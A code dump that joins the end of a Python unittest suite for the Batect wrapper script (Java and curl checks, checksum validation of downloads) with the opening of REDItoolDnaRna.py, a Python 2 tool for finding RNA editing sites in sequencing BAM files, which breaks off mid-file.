self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), result_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), result_output)
self.assertNotIn("#", result_output)
self.assertNotIn("Xferd", result_output)
self.assertEqual(result.returncode, 0)
def test_no_curl(self):
path_dir = self.create_limited_path(self.minimum_script_dependencies_with_default_bash)
result = self.run_script([], path=path_dir)
self.assertIn("curl is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_no_java(self):
path_dir = self.create_limited_path(self.minimum_script_dependencies_with_default_bash + ["/usr/bin/curl"])
result = self.run_script([], path=path_dir)
self.assertIn("Java is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_unsupported_java(self):
path_dir = self.create_limited_path_for_specific_java_version("7")
result = self.run_script([], path=path_dir)
self.assertIn("The version of Java that is available on your PATH is version 1.7, but version 1.8 or greater is required.\n" +
"If you have a newer version of Java installed, please make sure your PATH is set correctly.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_32bit_java(self):
path_dir = self.create_limited_path_for_specific_java("fake-32-bit")
result = self.run_script([], path=path_dir)
self.assertIn("The version of Java that is available on your PATH is a 32-bit version, but Batect requires a 64-bit Java runtime.\n" +
"If you have a 64-bit version of Java installed, please make sure your PATH is set correctly.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_mac_placeholder_java(self):
path_dir = self.create_limited_path_for_specific_java("fake-mac-placeholder")
result = self.run_script([], path=path_dir)
self.assertIn("Java is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_supported_java(self):
for version in ["8", "9", "10", "11"]:
with self.subTest(java_version=version):
path_dir = self.create_limited_path_for_specific_java_version(version)
result = self.run_script([], path=path_dir)
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
def test_supported_java_with_tool_options_set(self):
path_dir = self.create_limited_path_for_specific_java_version("8")
result = self.run_script([], path=path_dir, with_java_tool_options="true")
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
# macOS ships with Bash 3.2, so we need to make sure the wrapper works with that.
def test_supported_java_with_old_bash(self):
path_dir = self.create_limited_path_for_specific_java_version("8", bash="/shells/bash-3.2/bin/bash")
result = self.run_script([], path=path_dir)
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
def test_non_zero_exit(self):
result = self.run_script(["exit-non-zero"])
output = result.stdout.decode()
self.assertIn("The Java application has started.", output)
self.assertNotIn("WARNING: you should never see this", output)
self.assertEqual(result.returncode, 123)
def test_corrupt_download(self):
result = self.run_script([], download_url=self.download_url("brokenapp.txt"))
output = result.stdout.decode()
self.assertRegex(output, "The downloaded version of Batect does not have the expected checksum. Delete '.*' and then re-run this script to download it again.")
self.assertNotIn("The Java application has started.", output)
self.assertNotEqual(result.returncode, 0)
def test_corrupt_cached_version(self):
result_for_initial_download = self.run_script([])
self.assertEqual(result_for_initial_download.returncode, 0)
self.corrupt_cached_file()
result_after_corruption = self.run_script([])
output = result_after_corruption.stdout.decode()
self.assertRegex(output, "The downloaded version of Batect does not have the expected checksum. Delete '.*' and then re-run this script to download it again.")
self.assertNotIn("The Java application has started.", output)
self.assertNotEqual(result_after_corruption.returncode, 0)
def corrupt_cached_file(self):
with open(self.cache_dir + "/VERSION-GOES-HERE/batect-VERSION-GOES-HERE.jar", "a+") as f:
f.truncate(10)
def create_limited_path_for_specific_java_version(self, java_version, bash=default_bash):
return self.create_limited_path_for_specific_java("java-{}-openjdk-amd64".format(java_version), bash)
def create_limited_path_for_specific_java(self, java_name, bash=default_bash):
return self.create_limited_path(self.minimum_script_dependencies +
[
bash,
"/usr/bin/curl",
"/usr/lib/jvm/{}/bin/java".format(java_name),
])
def create_limited_path(self, executables):
path_dir = tempfile.mkdtemp()
self.addCleanup(lambda: shutil.rmtree(path_dir))
for executable in executables:
base_name = os.path.basename(executable)
os.symlink(executable, os.path.join(path_dir, base_name))
return path_dir
def run_script(self, args, download_url=None, path=os.environ["PATH"], quiet_download=None, with_java_tool_options=None):
if download_url is None:
download_url = self.default_download_url()
env = {
"BATECT_CACHE_DIR": self.cache_dir,
"BATECT_DOWNLOAD_URL": download_url,
"BATECT_DOWNLOAD_CHECKSUM": self.get_checksum_of_test_app(),
"PATH": path
}
if quiet_download is not None:
env["BATECT_QUIET_DOWNLOAD"] = quiet_download
if with_java_tool_options is not None:
env["JAVA_TOOL_OPTIONS"] = "-XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap"
path = self.get_script_path()
command = [path] + args
return subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
def get_checksum_of_test_app(self):
with open("test/testapp.jar", "rb") as f:
bytes = f.read()
return hashlib.sha256(bytes).hexdigest()
def get_script_dir(self):
return os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "src"))
def get_script_path(self):
return os.path.join(self.get_script_dir(), "template.sh")
def start_server(self):
self.server = http.server.HTTPServer(("", self.http_port), QuietHTTPHandler)
threading.Thread(target=self.server.serve_forever, daemon=True).start()
def stop_server(self):
self.server.shutdown()
self.server.server_close()
class QuietHTTPHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
if __name__ == '__main__':
unittest.main()
|
REDItoolDnaRna.py
|
#!/home/epicardi/bin/python27/bin/python
# Copyright (c) 2013-2014 Ernesto Picardi <ernesto.picardi@uniba.it>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys, os, time, math, random, getopt, operator, string, errno
try: import pysam
except: sys.exit('Pysam module not found.')
from multiprocessing import Process, Queue
from Queue import Empty
import gzip
pysamVersion=pysam.__version__
sys.stderr.write('Pysam version used: %s\n' %(pysamVersion))
version='1.3'
pid=str(os.getpid()+random.randint(0,999999999))
def usage():
print """
USAGE: python REDItoolDnaRNA.py [options]
Options:
-i RNA-Seq BAM file
-j DNA-Seq BAM file(s separated by comma) or folder
-I Sort input RNA-Seq BAM file
-J Sort input DNA-Seq BAM file
-f Reference in fasta file
-C Base interval to explore [100000]
-k List of chromosomes to skip separated by comma or file
-t Number of threads [1]
-Y Work Only On Region: chrxx:start-end (positions are distributed by the number of threads)
-o Output folder [rediFolder_%s]
-F Internal folder name [null]
-M Save a list of columns with quality scores
-c Min. read coverage (dna,rna) [10,10]
-q Min. quality score (dna,rna) [30,30]
-m Min. mapping quality score (dna,rna) [30,30]*
-O Min. homoplymeric length (dna,rna) [5,5]
-s Infer strand (for strand oriented reads) [1]
-g Strand inference type 1:maxValue 2:useConfidence [1]
-x Strand confidence [0.70]
-S Strand correction
-G Infer strand by GFF annotation (must be GFF and sorted, otherwise use -X)
-K GFF File with positions to exclude (must be GFF and sorted, otherwise use -X)
-T Work only on given GFF positions (must be GFF and sorted, otherwise use -X)
-X Sort annotation files
-e Exclude multi hits in RNA-Seq
-E Exclude multi hits in DNA-Seq
-d Exclude duplicates in RNA-Seq
-D Exclude duplicates in DNA-Seq
-p Use paired concardant reads only in RNA-Seq
-P Use paired concardant reads only in DNA-Seq
-u Consider mapping quality in RNA-Seq
-U Consider mapping quality in DNA-Seq
-a Trim x bases up and y bases down per read [0-0] in RNA-Seq
-A Trim x bases up and y bases down per read [0-0] in DNA-Seq
-b Blat file for correction in RNA-Seq
-B Blat file for correction in DNA-Seq
-l Remove substitutions in homopolymeric regions in RNA-Seq
-L Remove substitutions in homopolymeric regions in DNA-Seq
-v Min. num. of reads supporting the variation [3] for RNA-Seq
-n Min. editing frequency [0.1] for RNA-Seq
-N Min. variation frequency [0.1] for DNA-Seq
-z Exclude positions with multiple changes in RNA-Seq
-Z Exclude positions with multiple changes in DNA-Seq
-W Select RNA-Seq positions with defined changes (separated by comma ex: AG,TC) [default all]
-R Exclude invariant RNA-Seq positions
-V Exclude sites not supported by DNA-Seq
-w File containing splice sites annotations
-r Num. of bases near splice sites to explore [4]
-H No Table Header
--gzip Gzip output files
-h Print this help
--help
--reads Get reads containing reference mismatches
--addP Extract reads alignments with reference mismatches in bed3 format, it requires --reads
--rmIndels Remove positions with Indels in surrounding 5 bases
*This value may change according to the aligner:
- For Bowtie use 255
- For Bowtie2 use 40
- For BWA use 30
- For RNA-STAR use 255
- For HiSAT2 use 60
- For Tophat1 use 255
- For Tophat2 use 50
- For GSNAP use 30
"""%(pid)
#option --fastq Fastq to get reads [requires --reads], separated by comma [if paired] NOT IMPLEMENTED
#option --rmOver Remove overlapping reads NOT IMPLEMENTED
try:
opts, args = getopt.getopt(sys.argv[1:], "i:f:k:t:o:c:q:m:O:s:edpuA:a:B:b:lLv:n:EPr:hHIXG:K:j:C:JDUzw:N:ZW:RVMT:F:x:g:SY:",["help","gzip","reads","addP","rmIndels"])
except getopt.GetoptError as err:
print str(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
MAX_DEPTH=100000
strconf=0.70 #confidenza strand
useconf=0
corrstr=0
bamfile=''
gbamfile=[]
dgbamfile={} # dizionario di gbamfile
fastafile=''
sortbam=0
sortgbam=0
nochrs=[]
NCPU=1
infolder=''
outfolder_='rediFolder_%s' %(pid)
MINCOV=10
QVAL=33 #NOT USED
MQUAL=30
MAPQ=30
homo=5
rmpv = '0-0'
rmp = [int(x) for x in rmpv.split('-')]
getstrand=0 # considera la strand
exh=0 # escludi multi hits
exd=0 # escludi duplicati
conc=0 # se presenti paired-end, usa solo quelle concordanti
mq=0 # considera il map quality
rmnuc=0 # rimuovi nucleotide a monte ed a valle delle read; connesso a rmp e rmpv
blatr=0 # applica la correzione blat
blatfolder=''
rmsh=0 # rimuovi sostituzioni in omopolimeri di lunghezza maggiore o uguale a homo
vnuc=3 # numero minimo di basi che supportano la variazione
mmf=0.1 # frequenza minima della variazione
exms=0 # escludi sostituzioni multiple
exss=0 # escludi posizioni introniche nei pressi dei siti di splicing a nss nucleotidi
nss=4 # basi introniche da esplorare per ogni sito si splicing
splicefile='' #'splicesites.hg18.sorted.txt'
usubs=[x+y for x in 'ACGT' for y in 'ACGT' if x!=y] # use these substitutions [default all]
annfile='' # use annotation file for strand correction and features
sortann=0 # sort annotation file
uann=0 # use annotation
exfile='' # use annotations to exclude positions
expos=0 #
chunckval=100000
exinv=0
slist=0
slistfile=''
gslistfile=''
wfile='' # working file. GFF annotations to use
uwf=0 # use working file
workR=('',[0,0]) # specific working region
fworkR=0
rmOver=0
rmIndel=0
###########################
# for DNA-Seq
###########################
gMINCOV=10
gQVAL=33 #NOT USED
gMQUAL=30
gMAPQ=30
ghomo=5
grmpv = '0-0'
grmp = [int(x) for x in rmpv.split('-')]
gexh=0 # escludi multi hits
gexd=0 # escludi duplicati
gconc=0 # se presenti paired-end, usa solo quelle concordanti
gmq=0 # considera il map quality
grmnuc=0 # rimuovi nucleotide a monte ed a valle delle read; connesso a rmp e rmpv
gblatr=0 # applica la correzione blat
gblatfolder=''
grmsh=0 # rimuovi sostituzioni in omopolimeri di lunghezza maggiore o uguale a ghomo
gmmf=0.1 # frequenza minima della variazione
exnonh=0 # escludi posizioni non omozigoti
exnosupp=0 # escludi posizioni non supportate da DNA-Seq
nogbam=0 # esiste il bam per DNA-Seq
unchange1=1
unchange2=0
gziptab=0
greads=0
fastq=''
addP=0
noheader=0
for o, a in opts:
if o in ("-h","--help"):
usage()
sys.exit()
elif o == "-H": noheader=1
elif o == "-i": bamfile=a
elif o == "-j":
if os.path.isdir(a): gbamfile=[(os.path.join(a,x),0) for x in os.listdir(a) if x[-4:]=='.bam']
else: gbamfile=[(x,0) for x in a.split(',') if x.strip()!='']
dgbamfile=dict(gbamfile)
elif o == "-f": fastafile=a
elif o == "-k":
if os.path.exists(a):
f=open(a)
nochrs=[x.strip() for x in f if x.strip()!='']
f.close()
else: nochrs = a.split(',')
elif o == "-t": NCPU=int(a)
elif o == "-F": infolder=a
elif o == "-o": outfolder_=a
elif o == "-c":
MINCOV=int(a.split(',')[1])
gMINCOV=int(a.split(',')[0])
# elif o == "-Q":
# QVAL=int(a.split(',')[1])
# gQVAL=int(a.split(',')[0])
elif o == "-q":
MQUAL=int(a.split(',')[1])
gMQUAL=int(a.split(',')[0])
elif o == "-m":
MAPQ=int(a.split(',')[1])
gMAPQ=int(a.split(',')[0])
elif o == "-O":
homo=int(a.split(',')[1])
ghomo=int(a.split(',')[0])
elif o == "-S": corrstr=1
elif o == "-x": strconf=float(a)
elif o == "-g":
if a=='2': useconf=1
elif o == "-s":
getstrand=1
if int(a)==1: unchange1,unchange2=1,0
elif int(a)==0: unchange1,unchange2=0,0
elif int(a)==2: unchange1,unchange2=0,1
elif int(a)==12: unchange1,unchange2=1,1
elif o == "-e": exh=1
elif o == "-V": exnosupp=1
elif o == "-E": gexh=1
elif o == "-d": exd=1
elif o == "-Y":
try:
wline=a.split(':')
wchr=wline[0]
wcoord=[int(x.replace(',','')) for x in wline[1].split('-')]
workR=(wchr,wcoord)
except: sys.exit('Working region not correct. Use the format chrxx:start-end')
fworkR=1
elif o == "-D": gexd=1
elif o == "-p": conc=1
elif o == "-P": gconc=1
elif o == "-I": sortbam=1
elif o == "-J": sortgbam=1
elif o == "-X": sortann=1
elif o == "-R": exinv=1
elif o == "-C": chunckval=int(a)
elif o == "-u": mq=1
elif o == "-U": gmq=1
elif o == "-M": slist=1
elif o == "-a":
rmpv = a
try:
rmp = [int(x) for x in rmpv.split('-')]
rmnuc=1
except: rmnuc=0
elif o == "-A":
grmpv = a
try:
grmp = [int(x) for x in grmpv.split('-')]
grmnuc=1
except: grmnuc=0
elif o == "-b":
blatfolder=a
if os.path.exists(blatfolder): blatr=1
elif o == "-B":
gblatfolder=a
if os.path.exists(gblatfolder): gblatr=1
elif o == "-l": rmsh=1
elif o == "-L": grmsh=1
elif o == "-v": vnuc=int(a)
elif o == "-n": mmf=float(a)
elif o == "-N": gmmf=float(a)
elif o == "-z": exms=1
elif o == "-Z": exnonh=1
elif o == "-W": usubs=[x.upper() for x in a.split(',') if x.strip()!='']
elif o == "-w":
splicefile=a
if os.path.exists(splicefile): exss=1
elif o == "-K":
exfile=a
if os.path.exists(exfile): expos=1
elif o == "-T":
wfile=a
if os.path.exists(wfile): uwf=1
elif o == "-r": nss=int(a)
elif o == "-G":
annfile=a
uann=1
elif o == "--gzip": gziptab=1
elif o == "--reads": greads=1
elif o == "--addP": addP=1
elif o == "--rmOver": rmOver=1
elif o == "--rmIndels": rmIndel=1
#elif o == "--fastq": fastq=a.split(',')
else:
assert False, "Unhandled Option"
#######
commandLine=' '.join(sys.argv[1:])
script_time=time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time()))
params=[]
#Input parameters
params.append('REDItoolDnaRna version %s\n' %(version))
params.append('User command line: %s\n' %(commandLine))
params.append('Analysis ID: %s\n' %(pid))
params.append('Analysis time: %s\n' %(script_time))
params.append('-i --> RNA-Seq BAM file: %s\n' %(bamfile))
params.append('-j --> DNA-Seq BAM file(s): %s\n' %(','.join(dgbamfile.keys())))
params.append('-I --> Sort RNA-Seq BAM file: %i\n' %(sortbam))
params.append('-J --> Sort DNA-Seq BAM file: %i\n' %(sortgbam))
params.append('-f --> Reference file: %s\n' %(fastafile))
params.append('-C --> Base interval to explore: %i\n' %(chunckval))
params.append('-k --> Regions to exclude: %s\n' %(','.join(nochrs)))
params.append('-t --> Number of working threads: %i\n' %(NCPU))
params.append('-Y --> Work only on region %s:%i-%i : %i\n' %(workR[0],workR[1][0],workR[1][1],fworkR))
params.append('-o --> Output folder: %s\n' %(outfolder_))
params.append('-F --> Infolder folder: %s\n' %(infolder))
params.append('-M --> Save a list of columns with quality scores: %i\n' %(slist))
params.append('-c --> Min. per base coverage DNA-RNA: %i-%i\n' %(MINCOV,gMINCOV))
#params.append('-Q --> FastQ offset value DNA-RNA: %i-%i\n' %(gQVAL,QVAL))
params.append('-q --> Min. per base quality DNA-RNA: %i-%i\n' %(gMQUAL,MQUAL))
params.append('-m --> Min. mapping quality DNA-RNA: %i-%i\n' %(gMAPQ,MAPQ))
params.append('-O --> Min. homoplymeric length DNA-RNA: %i-%i\n' %(ghomo,homo))
params.append('-s --> Infer strand: %i - %i-%i\n' %(getstrand,unchange1,unchange2))
params.append('-g --> Use confidence: %i\n' %(useconf))
params.append('-x --> Strand confidence: %.2f\n' %(strconf))
params.append('-S --> Strand correction : %i\n' %(corrstr))
params.append('-G --> GFF annotation to infer strand: %s\n' %(annfile))
params.append('-K --> File with positions to exclude: %s\n' %(exfile))
params.append('-T --> Work only on given GFF positions: %s\n' %(wfile))
params.append('-X --> Sort annotation files: %i\n' %(sortann))
params.append('-e --> Exclude multi hits in RNA-Seq: %i\n' %(exh))
params.append('-E --> Exclude multi hits in DNA-Seq: %i\n' %(gexh))
params.append('-d --> Exclude duplicates in RNA-Seq: %i\n' %(exd))
params.append('-D --> Exclude duplicates in DNA-Seq: %i\n' %(gexd))
params.append('-p --> Use paired concardant reads in RNA-Seq: %i\n' %(conc))
params.append('-P --> Use paired concardant reads in DNA-Seq: %i\n' %(gconc))
params.append('-u --> Consider mapping quality in RNA-Seq: %i\n' %(mq))
params.append('-U --> Consider mapping quality in DNA-Seq: %i\n' %(gmq))
params.append('-a --> Trim x bases up and y bases down per RNA read: %i - %i-%i\n' %(rmnuc,rmp[0],rmp[1]))
params.append('-A --> Trim x bases up and y bases down per DNA read: %i - %i-%i\n' %(grmnuc,grmp[0],grmp[1]))
params.append('-b --> Blat folder for correction in RNA-Seq: %s\n' %(blatfolder))
params.append('-B --> Blat folder for correction in DNA-Seq: %s\n' %(gblatfolder))
params.append('-l --> Remove substitutions in homopolymeric regions for RNA-Seq: %i\n' %(rmsh))
params.append('-L --> Remove substitutions in homopolymeric regions for DNA-Seq: %i\n' %(grmsh))
params.append('-v --> Min. num. of reads supporting the variation: %i\n' %(vnuc))
params.append('-n --> Min. editing frequency for RNA-Seq: %.2f\n' %(mmf))
params.append('-N --> Min. editing frequency for DNA-Seq: %.2f\n' %(gmmf))
params.append('-z --> Exclude positions with multiple changes in RNA-Seq: %i\n' %(exms))
params.append('-Z --> Exclude positions with multiple changes in DNA-Seq: %i\n' %(exnonh))
params.append('-W --> Select RNA-Seq positions with defined changes: %s\n' %(','.join(usubs)))
params.append('-R --> Exclude invariant RNA-Seq positions: %i\n' %(exinv))
params.append('-V --> Exclude sites not supported by DNA-Seq: %i\n' %(exnosupp))
params.append('-w --> File containing splice sites annotations: %s\n' %(splicefile))
params.append('-r --> Num. of bases near splice sites to explore: %i\n' %(nss))
params.append('--gzip --> Gzip output files: %i\n' %(gziptab))
params.append('--reads --> Get reads containing reference mismatches: %i\n' %(greads))
params.append('--addP --> Extract reads alignments with reference mismatches in bed3 format, it requires --reads: %i\n' %(addP))
params.append('--rmIndel --> Remove positions with Indels in surrounding 5 bases: %i\n' %(greads))
#######
def whereis(program):
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and not os.path.isdir(os.path.join(path, program)): return 1
return 0
def get_no(pvalue,siglevel,ngenes): # No Correction
lista=[]
pp=siglevel
y=0
for i in pvalue:
p=i[0]
if p<=siglevel:
lista.append(i)
y+=1
return lista,y,pp
def get_b(pvalue,siglevel,ngenes): # Bonferroni
pvalue.sort()
lista=[]
y=0
#bcorr=siglevel/ngenes
pp=1.0
for i in pvalue:
p=i[0]*ngenes
if p<=siglevel:
lista.append(i)
#lista[i[1]]=i[0]
y+=1
if p<pp: pp=p
#print "Passed:",y,pp
return lista,y,pp
def get_bh(pvalue,siglevel,ngenes): # B-H
pvalue.sort()
#print ngenes
lista=[]
x=1
y=0
p=0
for i in pvalue:
nf=i[0]*ngenes
fdr=nf/x
if fdr<=siglevel:
#dic[i[1]]=i[0]
lista.append(i)
p=i[0]
y+=1
x+=1
#print "Passed:",y,p
return lista,y,p
def getTail(pp):
if ftail=='l': return pp.left_tail
elif ftail=='r': return pp.right_tail
elif ftail=='t': return pp.two_tail
def getDicSS(dicp): # dicp = dizionario con le frequenze di sostituzione
dicpp={}
for i in dicp:
if i[0]!=i[1]:
dicpp[i]=1-dicp[i]
return dicpp
def getFreads(bases):
fread={'A':0,'C':0,'G':0,'T':0}
for i in range(4):
if i==0: fread['A']=bases[i]
elif i==1: fread['C']=bases[i]
elif i==2: fread['G']=bases[i]
elif i==3: fread['T']=bases[i]
return fread
def getSub(ref,fread,dics):
#fread={A,C,G,T}
nref=fread[ref.upper()]
sub=[(ref.upper()+i,nref,fread[i]) for i in fread if i!=ref.upper() and fread[i]!=0]
allsub=' '.join([x[0] for x in sub])
# lista del tipo [('AT', 50, 10), ('AG', 50, 2)]
res=[] #[(int(dics[i[0]]*(i[1]+i[2])),((i[1]+i[2])-exp1),pvalue(i[1],i[2],int(dics[i[0]]*(i[1]+i[2])),((i[1]+i[2])-exp1))) for i in sub]
for i in sub:
#if binomial:
# pval=bdtrc(i[2],i[1]+i[2],(1.0-dics[i[0]]))
# #pval=Bprob(i[2],i[1]+i[2],(1.0-dics[i[0]]))
# #print i[2],i[1]+i[2],(1.0-dics[i[0]]),pval
# obs1,obs2,exp1,exp2=0,0,0,0
obs1=i[1]
obs2=i[2]
exp1=int(dics[i[0]]*(i[1]+i[2]))
exp2=((i[1]+i[2]) - exp1)
pval=pvalue(obs1,obs2,exp1,exp2)
pval=getTail(pval)
res.append((i[0],obs1,obs2,exp1,exp2,str(pval)))
if len(res)==1: return res[0][5] #,allsub,fread
elif len(res) > 1:
rr=[float(x[-1]) for x in res]
idx=rr.index(min(rr))
return res[idx][5] #,allsub,fread
else: return '1.0' #,0,0
def BaseCount(seq,ref,mfr,VNUC):
b={'A':0,'C':0,'G':0,'T':0}
subs=[]
subv=[]
for i in seq.upper():
if b.has_key(i): b[i]+=1
for i in b:
if not b.has_key(ref): continue
if b[i]!=0 and i!=ref:
vv=float(b[i])/(b[i]+b[ref])
subv.append((b[i],vv,ref+i))
subv.sort()
subv.reverse()
for i in subv:
if i[0]>=VNUC and i[1]>=mfr: subs.append(i[2])
freq=0.0
if len(subs)==0: subs.append('-')
else: freq=subv[0][1]
return sum(b.values()),[b['A'],b['C'],b['G'],b['T']],' '.join(subs),'%.2f'%(freq)
def meanq(v,n):
try:m=float(v)/n
except: m=0.0
return '%.2f'%(m)
def rmHomo(sequp,seqdw,gh,ref):
if len(sequp)==0 and len(seqdw)==0: return 0
up,dw=0,0
for i in seqdw:
if i==ref:dw+=1
else:break
for i in sequp[::-1]:
if i==ref:up+=1
else:break
hlen=up+dw+1
if hlen >= gh : return 1
return 0
def prop(tot,va):
try: av=float(va)/tot
except: av=0.0
return av
def vstand(strand):
vv=[(strand.count('+'),'+'),(strand.count('-'),'-'),(strand.count('*'),'*')]
if vv[0][0]==0 and vv[1][0]==0: return '*'
if useconf:
totvv=sum([x[0] for x in vv[:2]])
if prop(totvv,vv[0][0])>=strconf: return '+'
if prop(totvv,vv[1][0])>=strconf: return '-'
return '*'
else:
if vv[0][0]==vv[1][0] and vv[2][0]==0: return '+'
return max(vv)[1]
def comp(s):
a={'A':'T','T':'A','C':'G','G':'C'}
ss=''
for i in s.upper():
if a.has_key(i): ss+=a[i]
elif i==' ': ss+=' '
elif i=='-': ss+='-'
else: ss+='N'
return ss
def comp2(s):
ss={}
a={'A':'T','T':'A','C':'G','G':'C'}
for i,j in enumerate('ACGT'): ss[a[j]]=s[i]
return str([ss['A'],ss['C'],ss['G'],ss['T']])
def whereis(program):
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and not os.path.isdir(os.path.join(path, program)): return 1
return 0
def vstrand(lista):
if len(lista)==0: return '2'
p=lista.count('+')
m=lista.count('-')
if p==len(lista): return '1'
elif m==len(lista): return '0'
else: return '2'
def getd(lines):
d={}
for i in lines:
l=i.split('\t')
if len(l)>=3:
if l[2]=='+': strand='1'
elif l[2]=='-': strand='0'
else: strand='2'
else: strand='2'
d[int(l[1])]=strand
return d
def checkSubs(s):
if s=='-': return 1
for i in s.split():
if i in usubs: return 1
return 0
def makeCluster(allcoord):
cluster=[]
remaining=[]
c1=allcoord[0][0]
c2=allcoord[0][1]
for i in range(len(allcoord)):
if allcoord[i]!=(c1,c2):
if c1<=allcoord[i][0]<=c2:
cluster.append(allcoord[i])
if allcoord[i][1]>c2:
c2=allcoord[i][1]
else:
remaining.append(allcoord[i])
else:
cluster.append((c1,c2))
return (c1,c2),remaining
def newCoords(interval,start,end):
coords=[]
interval.sort()
while len(interval)!=0:
coord,interval=makeCluster(interval)
coords.append(coord)
c1,c2=coords[0][0],coords[-1][1]
if c1 < start: c1=start
if c2>end: c2=end
if c1==c2: c1=start-1 # MODIFICATO
if c1<0: c1=0 #fixed rare bug
return coords,c1,c2
def checkPos(coords,pos):
for i in coords:
if i[0]<=pos<=i[1]: return 1
return 0
def parseFeat(line):
l=line.split('\t')
cc=(int(l[3])-1,int(l[4])-1)
return cc
def normByStrand(seq_,strand_,squal_,mystrand_):
st='+'
if mystrand_=='0': st='-'
seq,qual,squal='',0,[]
for i in range(len(seq_)):
if strand_[i]==st:
seq+=seq_[i]
qual+=squal_[i] #-QVAL
squal.append(squal_[i])
return seq,qual,squal
def normByBlat(seq_,strand_,squal_,blatc_):
seq,qual,squal,strand='',0,[],''
for i in range(len(seq_)):
if blatc_[i]=='1':
seq+=seq_[i]
qual+=squal_[i]
squal.append(squal_[i])
strand+=strand_[i]
return seq,qual,squal,strand
def normByOverlap(seq_,strand_,squal_,blatc_,over_):
seq,qual,squal,strand,blatc='',0,[],'',[]
for i in range(len(seq_)):
if over_[i]==0:
seq+=seq_[i]
qual+=squal_[i]
squal.append(squal_[i])
strand+=strand_[i]
blatc.append(blatc_[i])
return seq,qual,squal,strand,blatc
def normByIndels(seq_,strand_,squal_,blatc_,indels_):
seq,qual,squal,strand,blatc='',0,[],'',[]
for i in range(len(seq_)):
if indels_[i]==0:
seq+=seq_[i]
qual+=squal_[i]
squal.append(squal_[i])
strand+=strand_[i]
try: blatc.append(blatc_[i])
except: pass
return seq,qual,squal,strand,blatc
def testBlat(blc):
if blc.count('1') > blc.count('0'): return 1
return 0
def countIndels(lista):
for i in lista:
if i.count(None)>0: return 1
return 0
def getOverlap(lista):
r=[0 for x in range(len(lista))]
l=[x[0] for x in lista]
us={}
x=0
for i in lista:
if l.count(i[0])==2:
s='='
if i[1]!=i[2]: s='!'
if us.has_key(i[0]): us[i[0]].append((x,s))
else: us[i[0]]=[(x,s)]
x+=1
for i in us:
v=us[i]
if v[0][1]==v[1][1]: r[v[0][0]]=1
else:
if v[0][1]=='!': r[v[0][0]]=1
elif v[1][1]=='!': r[v[1][0]]=1
return r
###########################################################
###########################################################
script_time=time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time()))
sys.stderr.write("Script time --> START: %s\n"%(script_time))
sys.stderr.write("Analysis ID: %s\n"%(pid))
###########################################################
#if greads:
# if not whereis('seqtk'): sys.exit('seqtk program not found.')
if not os.path.exists(bamfile):
usage()
sys.exit('RNA-Seq BAM file %s not found.' %(bamfile))
if sortbam:
sys.stderr.write('Sorting RNA-Seq BAM file.\n')
pysam.sort(bamfile,'sorted_%s'%(pid))
os.rename(bamfile,bamfile+'_old')
os.rename('sorted_%s.bam'%(pid),bamfile)
sys.stderr.write('Indexing RNA-Seq BAM file.\n')
pysam.index(bamfile)
if not os.path.exists(bamfile+'.bai') and not sortbam:
sys.stderr.write('Indexing RNA-Seq BAM file.\n')
pysam.index(bamfile)
###########################################################
dgdic={} # dizionario chr:bam file
for i in gbamfile:
if not os.path.exists(i[0]):
sys.stderr.write('DNA-Seq BAM file %s not found.\n' %(i[0]))
sys.stderr.write('Working without DNA-Seq BAM file %s.\n' %(i[0]))
del dgbamfile[i[0]]
else:
if sortgbam:
sys.stderr.write('Sorting DNA-Seq BAM file %s.\n' %(i[0]))
pysam.sort(i[0],'sorted_%s'%(pid))
os.rename(i[0],i[0]+'_old')
os.rename('sorted_%s.bam'%(pid),i[0])
sys.stderr.write('Indexing DNA-Seq BAM file %s.\n' %(i[0]))
pysam.index(i[0])
if not os.path.exists(i[0]+'.bai') and not sortgbam:
sys.stderr.write('Indexing DNA-Seq BAM file %s.\n' %(i[0]))
pysam.index(i[0])
if len(gbamfile)==0:
sys.stderr.write('Working without DNA-Seq BAM file(s).\n')
nogbam=1
else:
for i in dgbamfile:
idxinfo=pysam.idxstats(i)
for j in idxinfo.split('\n'): #MOD
l=(j.strip()).split('\t')
if l[0] in ['*','']: continue #MOD
if int(l[2])+int(l[3]) > 0: dgdic[l[0]]=i
###########################################################
if not os.path.exists(fastafile):
usage()
sys.exit('Fasta file %s not found.' %(fastafile))
if not os.path.exists(fastafile+'.fai'):
